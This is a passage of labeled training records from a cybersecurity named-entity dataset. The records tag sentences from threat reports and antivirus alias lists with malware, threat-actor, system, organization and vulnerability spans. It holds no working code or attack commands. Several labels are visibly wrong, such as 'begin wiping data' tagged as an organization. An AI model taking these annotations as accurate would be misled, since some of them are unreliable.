new OS X Trojan associated with the Sofacy group that we are now tracking with the Komplex' tag using the Palo Alto Networks AutoFocus threat intelligence platform.", "spans": {"ORGANIZATION: Unit 42 researchers": [[0, 19]], "SYSTEM: OS X": [[37, 41]], "MALWARE: Trojan": [[42, 48]], "THREAT_ACTOR: Sofacy group": [[69, 81]], "MALWARE: Komplex'": [[116, 124]], "ORGANIZATION: Palo Alto Networks": [[139, 157]], "SYSTEM: AutoFocus threat intelligence platform.": [[158, 197]]}, "info": {"id": "cyner2_train_006740", "source": "cyner2_train"}} {"text": "We are accustomed to seeing this gate operate directly from typical' compromised websites, but not so much from ad serving ones.", "spans": {}, "info": {"id": "cyner2_train_006741", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9959 Trojan.Win32.Yuzi.euhfho Backdoor.Yuzi W32/Trojan.UPLJ-0202 BDS/Yuzi.lbwpa Trojan.Win32.Z.Ursu.91648 Backdoor:MSIL/Yuzi.A Trj/GdSda.A Win32/Trojan.fd2", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006742", "source": "cyner2_train"}} {"text": "In addition to Russia, targeted regions include neighboring countries such as Mongolia, Belarus, and other European countries.", "spans": {}, "info": {"id": "cyner2_train_006743", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Klevate.S3 Trojan.Webprefix.Win32.62419 Trojan.Dropper.104 Win32.Trojan.Webprefix.a W32/WebPrefix.A Trojan.Win32.Webprefix.crgiyt Backdoor.W32.Androm.mCpQ TrojWare.Win32.Sisron.C BackDoor.Bulknet.1328 BehavesLike.Win32.Trojan.cc W32/Application.KRYM-8973 TrojanDownloader.Klevate.a Win32.Trojan-Dropper.Dlpro.A Trojan/Win32.Zbot.R94414 Win32/Webprefix.D W32/Webprefix.B!tr Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006744", "source": "cyner2_train"}} {"text": "It is therefore impossible to decode the communication if one wasn't listening right from its beginning.", "spans": {}, "info": {"id": 
"cyner2_train_006746", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan-Banker.Win32.BHO!O Win32.Trojan.WisdomEyes.16070401.9500.9988 Backdoor.Ratenjay Trojan-Downloader.Win32.VB.ifws Trojan.DownLoader5.54023 Trojan.Kazy.DE581 Trojan-Downloader.Win32.VB.ifws Downloader/Win32.Banload.C62226 Trojan-Downloader.Win32.Bancos", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006747", "source": "cyner2_train"}} {"text": "So , what can you do to protect yourself from this stealthy beast ? 1 .", "spans": {}, "info": {"id": "cyner2_train_006749", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32/HLLW.Std.B Worm/STD.B W32/Std.18437 Win32/HLLP.Std.B Worm.STD.A I-Worm.STD.B.nw5 Email-Worm.Win32.STD.B I-Worm/STD.b Email-Worm.Win32.Std.B W32/HLLW.Std.B", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006756", "source": "cyner2_train"}} {"text": "The end payload that was installed is the HttpBrowser RAT, known to be used by the Chinese group in previous targeted attacks against governments.", "spans": {"MALWARE: payload": [[8, 15]], "MALWARE: RAT,": [[54, 58]], "THREAT_ACTOR: the Chinese group": [[79, 96]], "ORGANIZATION: governments.": [[134, 146]]}, "info": {"id": "cyner2_train_006758", "source": "cyner2_train"}} {"text": "This Trojan is interesting due to its ability to steal logins, passwords, and other confidential data by displaying fraudulent authentication forms on top of any applications.", "spans": {"MALWARE: Trojan": [[5, 11]], "SYSTEM: applications.": [[162, 175]]}, "info": {"id": "cyner2_train_006759", "source": "cyner2_train"}} {"text": "It appears the purpose of the new Disttrack samples were solely focused on destruction, as the samples were configured with a non-operational C2 server to report to and were set to begin wiping data exactly on 2016/11/17 20:45.", "spans": {"MALWARE: Disttrack samples": [[34, 51]], "ORGANIZATION: begin wiping data": [[181, 198]]}, "info": {"id": 
"cyner2_train_006760", "source": "cyner2_train"}} {"text": "Kazuar includes a highly functional command set, which includes the ability to remotely load additional plugins to increase the Trojan's capabilities.", "spans": {"MALWARE: Kazuar": [[0, 6]], "MALWARE: Trojan's": [[128, 136]]}, "info": {"id": "cyner2_train_006761", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.FakeSvchostsysLnrA.Trojan Win32.Trojan.WisdomEyes.16070401.9500.9849 Trojan.Win32.Downloader.40960.TR Trojan.Win32.Swisyn W32/Trojan.UTND-0495 Downloader/Win32.OnlineGameHack.R3893 Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006762", "source": "cyner2_train"}} {"text": "However, many of these malware are fileless only while entering a user's system, as they eventually reveal themselves when they execute their payload.", "spans": {"MALWARE: malware": [[23, 30]], "MALWARE: fileless": [[35, 43]], "SYSTEM: a user's system,": [[64, 80]], "MALWARE: payload.": [[142, 150]]}, "info": {"id": "cyner2_train_006763", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Skeeyah.9109 Trojan.Injector BKDR_RMTSVC.V W32/Trojan.FQOB-6520 BKDR_RMTSVC.V Trojan.Win32.Pincav.darg Trojan.Win32.Pincav.dmwojx Troj.W32.Pincav!c Trojan.Inject1.50635 Trojan.Pincav.Win32.24903 BehavesLike.Win32.Dropper.gc Trojan.Pincav.um Trojan.Win32.Pincav.darg Backdoor:Win32/Rmtsvc.C!bit Trojan.Pincav Win32.Trojan.Pincav.Akpm Trojan.Pincav!MRbJOfrjW/0 Backdoor.Win32.RmtSvc W32/Pincav.B!tr Win32/Trojan.84c", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006764", "source": "cyner2_train"}} {"text": "A backdoor also known as: Backdoor.Hupigon.Win32.133953 Win32.Trojan.WisdomEyes.16070401.9500.9985 W32/QQRob.LP Trojan.PWS.QQPass Win32/AdClicker.UB Backdoor.Win32.Hupigon.olbg Trojan.Win32.Hupigon.eajxbh Trojan.PWS.Qqrobber.155 trojan.win32.dorv.a PWS-Gamania.dll W32/QQRob.TWJB-5358 Trojan/PSW.QQRobber.iu DR/PSW.QQRob.V.2 
Trojan[Backdoor]/Win32.Hupigon Trojan.Heur.PT.E044E0 Trojan/Win32.Pwstealer.C63180 PWS-Gamania.dll Win32/PSW.QQRob.NAH Backdoor.Win32.Hupigon Win32/Cekar.G Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006765", "source": "cyner2_train"}} {"text": "As spotted by FireEye on 2015-04-17, Angler EK is now taking advantage of a vulnerability patched with the last version of Flash Player 17.0.0.169", "spans": {"ORGANIZATION: FireEye": [[14, 21]], "THREAT_ACTOR: Angler EK": [[37, 46]], "VULNERABILITY: vulnerability": [[76, 89]], "SYSTEM: Flash Player": [[123, 135]]}, "info": {"id": "cyner2_train_006769", "source": "cyner2_train"}} {"text": "In the first of our series on the dark web, Cyble uncovered a new strain of InfoStealer malware targeting Cryptocurrency users via phishing sites and YouTube channels, as well as the source code and GitHub repository.", "spans": {"THREAT_ACTOR: the dark web,": [[30, 43]], "ORGANIZATION: Cyble": [[44, 49]], "MALWARE: new strain": [[62, 72]], "MALWARE: InfoStealer malware": [[76, 95]], "ORGANIZATION: Cryptocurrency users": [[106, 126]], "ORGANIZATION: YouTube channels,": [[150, 167]], "SYSTEM: GitHub repository.": [[199, 217]]}, "info": {"id": "cyner2_train_006770", "source": "cyner2_train"}} {"text": "In April 2017, the Cisco Talos team disclosed the Scarcruft group's proprietary tool, ROKRAT, a malware that has been continuously modified and used by the group to this day.", "spans": {"ORGANIZATION: Cisco Talos team": [[19, 35]], "THREAT_ACTOR: the Scarcruft group's": [[46, 67]], "MALWARE: ROKRAT,": [[86, 93]], "MALWARE: malware": [[96, 103]], "THREAT_ACTOR: the group": [[152, 161]]}, "info": {"id": "cyner2_train_006772", "source": "cyner2_train"}} {"text": "Its malicious code is located in a Mach-O object file that was repackaged into some versions of Xcode installers.", "spans": {"MALWARE: malicious code": [[4, 18]], "SYSTEM: Xcode installers.": [[96, 113]]}, "info": {"id": "cyner2_train_006774", 
"source": "cyner2_train"}} {"text": "A backdoor also known as: Backdoor.Win32.VB!O TROJ_GE.C2A90427 Multi.Threats.InArchive W32/Rewdulon.A TROJ_GE.C2A90427 Win.Trojan.Dentenspy-1 Trojan.Win32.VB.pbucu Trojan.WinSpy.1721 Trojan.VB.Win32.74988 W32/Rewdulon.RWFU-0950 TrojanSpy.VB.eqx TR/Proxy.VB.mm Trojan[Proxy]/Win32.VB Backdoor:Win32/Rewdulon.A Trojan.Heur.VP2.EA6021 Trojan/Win32.Winspy.R17397 TrojanProxy.VB Win32/Spy.VB.NPF Trojan.PR.VB!L9iJM/+WFQY Trojan-Proxy.Win32.VB Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006775", "source": "cyner2_train"}} {"text": "A backdoor also known as: Android.Trojan.FakeInst.L Android.FakeNotify.A Android.Trojan.FakeInst.L Android.Trojan.FakeInst.L HEUR:Trojan-SMS.AndroidOS.Opfake.bo A.H.Pay.Emugo.L Trojan.Android.Opfake.dtqjss Android.Malware.Trojan Trojan:Android/FakeNotify.A Trojan[SMS]/Android.Opfake Android.Trojan.FakeInst.L HEUR:Trojan-SMS.AndroidOS.Opfake.bo Android-Trojan/SmsSend.837f Trojan.AndroidOS.FakeInst.D Trojan.AndroidOS.MalCrypt", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006776", "source": "cyner2_train"}} {"text": "A new spear phishing campaign is targeting Saudi Arabia governmental organizations.", "spans": {"THREAT_ACTOR: spear phishing campaign": [[6, 29]], "ORGANIZATION: governmental organizations.": [[56, 83]]}, "info": {"id": "cyner2_train_006777", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Graftor.D25EAD Win32.Trojan.WisdomEyes.16070401.9500.9841 Backdoor.Trojan BKDR_SMALL.W Win.Trojan.Coreshell-1 Trojan.Win32.Metlar.hmosd Trojan.Click2.7627 BKDR_SMALL.W BDS/Metlar.A Backdoor:Win32/Metlar.A W32/Small.W!tr.bdr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006778", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.Blackmail.Worm Win32.Worm.Killav.GR Worm/W32.Nyxem.65024.B Email-Worm.Win32.Nyxem!O Worm.Nyxem W32/MyWife.d@MM!M24 W32/VB.bi WORM_NYXEM.E Win32.Worm.VB.sy 
W32/Kapser.A@mm W32.Blackmal.E@mm Win32/Blackmal.F!CME24 WORM_NYXEM.E Win.Worm.Nyxem-7 Email-Worm.Win32.Nyxem.e Win32.Worm.Killav.GR Trojan.Win32.Nyxem.wcrgf W32.W.Nyxem.lNe6 Win32.Worm-email.Nyxem.Syhr Win32.Worm.Killav.GR Worm.Win32.VB.NEI Email-Worm:W32/Nyxem.E BehavesLike.Win32.Worm.kc W32/Kapser.KOCX-1196 I-Worm/VB.g WORM/KillAV.GR Worm[Email]/Win32.Nyxem Worm:Win32/Mywife.E@mm!CME24 Win32.Worm.Killav.GR I-Worm.Win32.Nyxem.E Win32.Worm.Killav.GR Worm/Win32.Nyxem.R67250 Win32.Worm.Killav.GR Email-Worm.VB Win32/VB.NEI Worm.P2P.VB.CIL!CME-24 Win32.Worm.Killav.GR W32/Nyxem.E@mm W32/Tearec.A.worm!CME-24 Trojan.Win32.KillAV.AG", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006779", "source": "cyner2_train"}} {"text": "A backdoor also known as: AIT:Trojan.Nymeria.219 Trojan.Fsysna AIT:Trojan.Nymeria.219 W32/Trojan.KHZX-2886 Trojan.Win32.Fsysna.epqb AIT:Trojan.Nymeria.219 Trojan.Win32.Fsysna.eusaby AIT:Trojan.Nymeria.219 AIT:Trojan.Nymeria.219 Trojan.Fsysna.Win32.15287 Trojan.Win32.Autoit TR/Fsysna.vdzaj AIT:Trojan.Nymeria.219 Trojan.Win32.Fsysna.epqb Trojan:Win32/Enotdap.A Trojan/Win32.Fsysna.C2239375 Trj/CI.A Win32.Trojan.Fsysna.Iiu W32/Autoit.CK!tr.spy Win32/Trojan.623", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006780", "source": "cyner2_train"}} {"text": "In April, the new Infostealer family of Spanish origin was first noted targeting users in the U.S. 
and Mexico.", "spans": {"MALWARE: Infostealer family": [[18, 36]], "ORGANIZATION: targeting users": [[71, 86]]}, "info": {"id": "cyner2_train_006781", "source": "cyner2_train"}} {"text": "The operation uses known and patched exploits to deliver a custom backdoor known as KeyBoy.", "spans": {"THREAT_ACTOR: The operation": [[0, 13]], "VULNERABILITY: patched exploits": [[29, 45]], "MALWARE: KeyBoy.": [[84, 91]]}, "info": {"id": "cyner2_train_006782", "source": "cyner2_train"}} {"text": "The variant is highly targeted, digitally signed, and exfiltrates stolen payment card data over DNS.", "spans": {"MALWARE: variant": [[4, 11]], "SYSTEM: DNS.": [[96, 100]]}, "info": {"id": "cyner2_train_006784", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Dropper.Snuff.A Win32.TrojanDropper.Snuff.A.2 Trojan/Dropper.FC.a Trojan.DR.FC!ID4WOR5KQxg Win32/TrojanDropper.FC.A Backdoor.Trojan.dr W32/FC.Y Win32/TrojanRunner.I TROJ_DROPPER.ACU Win32.TRFC.A Trojan-Dropper.Win32.FC.a Trojan.Dropper.Snuff.A Virus.Win32.Trojano.421!IK TrojWare.Win32.TrojanDropper.FC.A Trojan.Dropper.Snuff.A BackDoor.Bifrost.14965 TR/FC.A TROJ_DROPPER.ACU TrojanDropper.Win32.FC TrojanDropper:Win32/Snuff.A Trojan.Win32.FC.21040 Trojan.Dropper.Snuff.A Dropper/FC.4096 Trojan-Dropper.Win32.FC.a Backdoor.Trojan Harm.SysCrash Virus.Win32.Trojano.421 W32/Fc.A!tr Dropper.Tiny.K Trj/MultiDrp.AF", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006786", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Mauvaise.SL1 Trojan.Zusy.D3A031 Trojan.Kwampirs TROJ_KWAMPIRS.SMJK Trojan.Win32.Bedep.az TROJ_KWAMPIRS.SMJK BehavesLike.Win32.BadFile.dm Trojan.Win32.Kwampirs Trojan.Bedep.u TR/Crypt.ZPACK.sfqtf Trojan.Win32.Bedep.az Trojan/Win32.Bedep.R199961 Trojan.Bedep Trojan.Injector Trj/GdSda.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006787", "source": "cyner2_train"}} {"text": "From these reports, we know that the group uses an 
abundance of tools and tactics, ranging across zero-day exploits targeting common applications such as Java or Microsoft Office, heavy use of spear-phishing attacks, compromising legitimate websites to stage watering-hole attacks, and targeting over a variety of operating systems – Windows, OSX, Linux, even mobile iOS.", "spans": {"THREAT_ACTOR: group": [[37, 42]], "MALWARE: tools": [[64, 69]], "VULNERABILITY: zero-day exploits": [[98, 115]], "SYSTEM: applications": [[133, 145]], "SYSTEM: Java": [[154, 158]], "SYSTEM: Microsoft Office,": [[162, 179]], "SYSTEM: operating systems": [[314, 331]], "SYSTEM: Windows, OSX, Linux,": [[334, 354]], "SYSTEM: mobile iOS.": [[360, 371]]}, "info": {"id": "cyner2_train_006789", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.HfsAutoB.4D03 Trojan.Zenshirsh.SL7 Win32.Trojan.WisdomEyes.16070401.9500.9639 Trojan.Win32.TPM.eslggg BehavesLike.Win32.PWSZbot.cc Trojan.Heur.RP.ZyWaayyb2wki Trojan.Win32.Z.Ircbot.839168.A Win32.Trojan.Crypt.Hqux Trojan.Themida! 
Trojan-PWS.OnlineGames Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006791", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan-Downloader.Win32.Gamarue.2!O Win32.Trojan.WisdomEyes.16070401.9500.9999 BKDR_PROTUX.SMZKEB-G Trojan.Win32.RedCap.exxfqg Trojan.Win32.Z.Zusy.8916480 Trojan.MulDrop7.62734 Trojan.Banbra.Win32.27829 BKDR_PROTUX.SMZKEB-G W32/Trojan.CPEN-4136 TR/RedCap.xslwz Trojan.Symmi.D1461E Trojan/Win32.Comnie.R209069 Trojan.Drnohell Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006795", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan/W32.Bublik.274432.B Backdoor.Win32.Caphaw Trojan.Symmi.D1465 Win32.Trojan.WisdomEyes.16070401.9500.9995 W32/Trojan.ELRU-2307 Trojan.Win32.Caphaw.exkhwo Trojan.Win32.A.Bublik.274432.D BackDoor.Caphaw.2 BehavesLike.Win32.PWSZbot.dh Trojan.Win32.Bublik Trojan/Bublik.ank Backdoor:Win32/Caphaw.D Trojan/Win32.Bublik.R46085 Backdoor.Win32.Caphaw SScope.Backdoor.Caphaw.A Win32/Trojan.144", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006796", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Fifesock W32.W.Otwycal.l4av Net-Worm.Win32.Koobface Spammer:Win32/Fifesock.B Win32/RiskWare.PEMalform.E Win32/Trojan.c9e", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006800", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.RansomGimemoB.Trojan Trojan.Win32.Kazy!O Trojan.Qhost.Win32.6280 Trojan.Kazy.D7BDE9 Win32.Trojan.WisdomEyes.16070401.9500.9903 Win32/Ternanu.C HV_ZYX_BG26035C.TOMC Trojan.Win32.Inject.sbpf Trojan.Win32.DownLoad2.brqxff Packer.W32.Krap.ldx7 Trojan.DownLoad2.39110 BehavesLike.Win32.Virus.dh Trojan-Ransom.Win32.Gimemo Trojan/Qhost.cty W32.Gimemo Trojan[Backdoor]/Win32.Delf Trojan/Win32.FakeAV.R10033 Trojan-Dropper.11705 Ransom.FileCryptor W32/Injector.HVQ!tr Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": 
{"id": "cyner2_train_006802", "source": "cyner2_train"}} {"text": "We are not including the IP addresses from the C2 infrastructure since it is compromised infrastructure that is not longer in use", "spans": {"SYSTEM: C2 infrastructure": [[47, 64]], "VULNERABILITY: compromised": [[77, 88]]}, "info": {"id": "cyner2_train_006804", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Dynamer.S488527 Trojan.Smallprox Trojan.Win32.Zusy.elolmi Trojan.Proxy2.577 TR/Proxy.mzyhy Trojan.Symmi.D11AD5 Win32/Trojan.1ff", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006806", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan/W32.HackTool.18432.M Win32.Trojan.WisdomEyes.16070401.9500.9952 Hacktool.Notahproxy HackTool:Win32/Onaht.A Riskware.HackTool!NeLzDaI7P40 Malware_fam.NB Win32/Trojan.Hacktool.4e9", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006808", "source": "cyner2_train"}} {"text": "Examples included fake commercial suppliers or shipping companies sending an updated price list, banks asking customers to validate banking information, or confirmation of equipment delivery.", "spans": {}, "info": {"id": "cyner2_train_006809", "source": "cyner2_train"}} {"text": "A backdoor also known as: Heur.Adware.FC.529 Trojan.Razy.D2449C Win32.Trojan.WisdomEyes.16070401.9500.9898 Riskware.Win32.Dotdo.ewnrxt Adware.Dotdo.25 Trojan.MSIL.Trojanproxy TR/Proxy.ulkkx Trojan:MSIL/Faikdal.A PUP.DotDo/Variant Adware.DotDo.DotPrx Trj/GdSda.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006811", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.OpaservA.Worm Net-Worm.Win32.Opasoft!O W32.OpaServ.A W32/Opaserv.worm.a WORM_OPASERV.A Win32.Worm.Opaserv.e W32/Opaserv.worm.A W32.Opaserv.Worm Win32/Opaserv.A WORM_OPASERV.A Win.Worm.OpaSoft-3 Net-Worm.Win32.Opasoft.a Trojan.Win32.Opasoft.wglh Worm.Win32.Opaserv Win32.Worm-net.Opasoft.Eeqs Win32.Opasoft 
Trojan.OpaKill.Win32.1 W32/Opaserv.worm.a Worm.Win32.Opasoft.A W32/Opaserv.worm.A Worm/Opasoft.a Worm[Net]/Win32.Opasoft Worm.Opasoft Net-Worm.Win32.Opasoft.a Worm:Win32/Opaserv.A Win32/Opasoft.worm.28672 Worm.Opaserv.AT W32/Opaserv.fam", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006812", "source": "cyner2_train"}} {"text": "The threat actors are reusing tools, techniques, and procedures which overlap throughout these operations with little variance.", "spans": {"THREAT_ACTOR: The threat actors": [[0, 17]], "MALWARE: tools,": [[30, 36]]}, "info": {"id": "cyner2_train_006815", "source": "cyner2_train"}} {"text": "This attack highlights how macro malware in Microsoft Office files is fast becoming a big threat to businesses and organizations.", "spans": {"MALWARE: macro malware": [[27, 40]], "SYSTEM: Microsoft Office": [[44, 60]], "VULNERABILITY: big threat": [[86, 96]], "ORGANIZATION: businesses": [[100, 110]], "ORGANIZATION: organizations.": [[115, 129]]}, "info": {"id": "cyner2_train_006816", "source": "cyner2_train"}} {"text": "A backdoor also known as: Heur.Corrupt.PE Trojan[Exploit]/Win32.CCProxyOver Exploit:Win32/Prix.A.dam#2", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006819", "source": "cyner2_train"}} {"text": "As reported, the source of the attack appears to have been the website of the Polish financial regulator.", "spans": {"ORGANIZATION: the Polish financial regulator.": [[74, 105]]}, "info": {"id": "cyner2_train_006820", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9996 Trojan:MSIL/Bogoclak.A Trojan.MSIL.Lynx.3 Trj/GdSda.A Backdoor.MSIL MSIL/Stealors.NET!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006821", "source": "cyner2_train"}} {"text": "Signing the malware with a stolen and subsequently publicly leaked code-signing certificate is sloppy even for well-known CN-APT groups.", "spans": {"MALWARE: 
malware": [[12, 19]], "THREAT_ACTOR: CN-APT groups.": [[122, 136]]}, "info": {"id": "cyner2_train_006822", "source": "cyner2_train"}} {"text": "Through correlation of technical indicators and command and control infrastructure, FireEye assess that APT28 is probably responsible for this activity.", "spans": {"SYSTEM: command": [[48, 55]], "ORGANIZATION: FireEye": [[84, 91]], "THREAT_ACTOR: APT28": [[104, 109]]}, "info": {"id": "cyner2_train_006823", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.Chiko.Worm Trojan/W32.StartPage.377856 Trojan.Win32.StartPage!O Worm.AutoRun W32.W.Fearso.kYUv WORM_SILLY.ICA Win32.Worm.Delf.cg W32.SillyFDC Win32/Chike.A Worm.Win32.AutoRun.ihn Trojan.Win32.StartPage.yqro Trojan.Win32.StartPage.377856 Trojan.StartPage.52501 Trojan.StartPage.Win32.1 Virus.Win32.Alman Trojan/StartPage.de TR/Delf.AKP Trojan/Win32.StartPage Win32.Virut.ce.57344 Trojan.Heur.ED91C9 Worm.Win32.AutoRun.ihn Worm:Win32/Chiki.A HEUR/Fakon.mwf TScope.Trojan.Delf W32/Chike.C.worm Win32/Delf.NFT Win32.Worm.Autorun.Pavh Trojan.StartPage!orHv1sw9Olo W32/StartPage.AJH!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006825", "source": "cyner2_train"}} {"text": "A backdoor also known as: Backdoor.W32.Nethief.l7ro TrojWare.Win32.Packed.PNC BehavesLike.Win32.Backdoor.kc Trojan.Krypt.19 Trojan-Dropper.Delf Trj/CI.A Win32/Trojan.8cd", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006826", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Inject.ASP Trojan.Inject.ASP Trojan.Inject.ASP Win32.Trojan.WisdomEyes.16070401.9500.9999 Trojan.Inject.ASP Trojan.Inject.ASP Trojan.Win32.Kryptik.evmmfw Trojan.Win32.Z.Inject.49664 Trojan.Inject.ASP Trojan.Inject.ASP Trojan.Crypt3 W32/Trojan.HLQX-0378 Backdoor:Win32/Deselia.B!dha Trojan/Win32.Kryptik.R153606 W32/ESILE.C!tr Script/Trojan.b13", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006827", "source": "cyner2_train"}} 
{"text": "Longhorn, which we internally refer to as The Lamberts first came to the attention of the ITSec community in 2014, when our colleagues from FireEye discovered an attack using a zero day vulnerability CVE-2014-4148.", "spans": {"THREAT_ACTOR: Longhorn,": [[0, 9]], "THREAT_ACTOR: The Lamberts": [[42, 54]], "ORGANIZATION: ITSec community": [[90, 105]], "ORGANIZATION: FireEye": [[140, 147]], "VULNERABILITY: a zero day vulnerability": [[175, 199]]}, "info": {"id": "cyner2_train_006828", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Zusy.D2E557 Trj/GdSda.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006829", "source": "cyner2_train"}} {"text": "It is hardly surprising that there is an element of overlap, considering both actors have for years mined victims in the South China Sea area, apparently in search of geo-political intelligence.", "spans": {}, "info": {"id": "cyner2_train_006831", "source": "cyner2_train"}} {"text": "BEBLOH always came up with new defensive measures to avoid AV products, and this time is no different.", "spans": {"MALWARE: BEBLOH": [[0, 6]], "SYSTEM: AV products,": [[59, 71]]}, "info": {"id": "cyner2_train_006832", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan/Downloader.Banload.reo Win32.Trojan.WisdomEyes.16070401.9500.9590 Win.Trojan.Graftor-2494 Trojan.Win32.Graftor.cuifrv Trojan.Banker.Win32.94901 TR/Graftor.6930.12 Trojan.Graftor.D17FC TrojanDownloader:Win32/Bangkgrob.A Trj/CI.A TrojanSpy.Banker!0zttYTGMFlo Trojan-Downloader.Win32.Banload W32/Banker.ZZN!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006835", "source": "cyner2_train"}} {"text": "That number is likely inflated, mainly because of dynamic IP allocation and historic records not being removed promptly.", "spans": {"VULNERABILITY: historic records not being removed promptly.": [[76, 120]]}, "info": {"id": "cyner2_train_006836", "source": "cyner2_train"}} {"text": "A 
backdoor also known as: Trojan.Malruze Trojan.Win32.Z.Malruze.113664 Trojan:Win32/Malruze.A!gfc", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006837", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan-Ransom.Win32.Birele!O Win32.Trojan.WisdomEyes.16070401.9500.9907 W32/Miner.UKCL-7487 W32/Miner.B Trojan.Win32.CoinMiner.pmp Trojan/Win32.Miner.C2255099", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006838", "source": "cyner2_train"}} {"text": "Recently, the Threat Monitoring System of QiAnXin Threat Intelligence Center monitored that a botnet written in GO language was spreading through multiple vulnerabilities.", "spans": {"SYSTEM: the Threat Monitoring System": [[10, 38]], "ORGANIZATION: QiAnXin Threat Intelligence Center": [[42, 76]], "MALWARE: botnet": [[94, 100]], "SYSTEM: GO language": [[112, 123]], "VULNERABILITY: multiple vulnerabilities.": [[146, 171]]}, "info": {"id": "cyner2_train_006839", "source": "cyner2_train"}} {"text": "The site is redirecting users to rgdotfoldersasapdotcom which is a RIG EK landing page that serves a malicious flash file and a malicious binary.", "spans": {"MALWARE: RIG EK": [[67, 73]], "MALWARE: malicious flash file": [[101, 121]], "MALWARE: malicious binary.": [[128, 145]]}, "info": {"id": "cyner2_train_006841", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.WintaskLTH.Trojan Worm.Psyokym.A3 W32.SillyFDC WORM_PSYOKYM.SM23 Trojan-Dropper.Win32.Sysn.bqcc Trojan.Win32.WBNA.ctgbxm Trojan.DownLoader5.33626 WORM_PSYOKYM.SM23 Worm.Win32.Psyokym WORM/Psyokym.A.34 Worm:Win32/Psyokym.A Trojan.Zusy.D393D Trojan.Win32.Downloader.189952.AV Trojan-Dropper.Win32.Sysn.bqcc HEUR/Fakon.mwf Worm.AutoRun!angV1RJQRlk W32/Virut.CE", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006842", "source": "cyner2_train"}} {"text": "For over half a decade, the Naikon APT waged multiple attack campaigns on sensitive targets throughout 
